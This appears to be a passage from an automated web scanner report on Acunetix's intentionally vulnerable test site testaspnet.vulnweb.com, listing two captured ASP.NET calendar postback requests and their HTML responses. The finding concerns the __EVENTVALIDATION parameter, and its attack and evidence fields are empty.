Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8526&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDA3NXETdsIZGRkLfoZQmYfsFSVGDwt4E7%2BYiS7bhE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKmm9adAwLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA6mrLHqg68EhYfHyk7650M1T%2Fge5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:50 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgDA3NXETdsIZGRkLfoZQmYfsFSVGDwt4E7+YiS7bhE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKmm9adAwLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA6mrLHqg68EhYfHyk7650M1T/ge5" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:White" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8189&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAApwD0RNoIZGRko%2F9WKC0a0Nue3SIcU8b%2BvlYV2KM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKMrcp7Arrjr%2BwOApyKwu8BAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6%2FSUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng%2FQwC19ng%2FQwC19mUkAQC19mUkAQC19nI%2BQIC19nI%2BQIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW%2Fw8CqOCW%2Fw8CqOCKkgcCqOCKkgcCqOC%2BKQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg%2BocKAqjg%2BocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9%2FTiBQKN9%2FTiBQKN9%2Bi5DQKN9%2Bi5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD%2B5WlYFYHksJgTjLKRYaJlqhFOFr
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:17 GMT Content-Length: 12440
Response Body - size: 12,440 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgAApwD0RNoIZGRko/9WKC0a0Nue3SIcU8b+vlYV2KM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKMrcp7Arrjr+wOApyKwu8BAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPApC6yY4HApC6yY4HApC6/SUCkLr9JQKQupH4CQKQupH4CQKQuoWfAQKQuoWfAQKQurmyCgKQurmyCgKQuq3JAwKQuq3JAwKQusHtDAKQusHtDAKQurXVCQKQurXVCQKQuqnoAgKQuqnoAgLX2eieBwLX2eieBwLX2Zw1AtfZnDUC19mwyAkC19mwyAkC19mk7wIC19mk7wIC19nYgwoC19nYgwoC19nMpgMC19nMpgMC19ng/QwC19ng/QwC19mUkAQC19mUkAQC19nI+QIC19nI+QIC19n8nAoC19n8nAoCqODOhQ0CqODOhQ0CqODi2AYCqODi2AYCqOCW/w8CqOCW/w8CqOCKkgcCqOCKkgcCqOC+KQKo4L4pAqjg0s0JAqjg0s0JAqjgxuACAqjgxuACAqjg+ocKAqjg+ocKAqjgru8IAqjgru8IAqjgwgMCqODCAwKN96yrAwKN96yrAwKN98DPDAKN98DPDAKN9/TiBQKN9/TiBQKN9+i5DQKN9+i5DQKN95zcBgKN95zcBgKN97DzDwKN97DzD+5WlYFYHksJgTjLKRYaJlqhFOFr" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:White" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
